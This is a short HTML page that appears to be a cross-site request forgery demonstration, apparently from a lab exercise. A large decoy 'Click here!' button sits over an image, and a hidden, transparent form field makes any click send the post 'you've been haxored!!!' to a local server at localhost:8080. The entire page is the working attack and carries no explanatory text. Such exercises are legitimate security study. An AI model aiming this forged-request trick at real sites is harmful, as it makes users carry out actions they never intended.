<style>
.btn
{
    color: black;
    font-weight: bold;
    font-size: 20px;
    padding: 20px;
    padding-right: 200px;
    padding-left: 200px;
    background-color: yellow;
    position: absolute;
    z-index: 5;
}

.hide
{
    background-color: transparent; 
    border: none;
    font-size: 1px;
    color: white;
    position: absolute;
    z-index: 1;
}
</style>

<body>    
    <img src="https://i.imgur.com/59sLZni.png" style="width: 505px; height: 505px;"/>
        <form action="http://localhost:8080/index" method="POST"> 
            <input class="hide" name="post" value="you've been haxored!!!"/>     
            <input type="submit" class="btn" name="submitbtn" value="Click here!"/>     
        </form>
</body> 




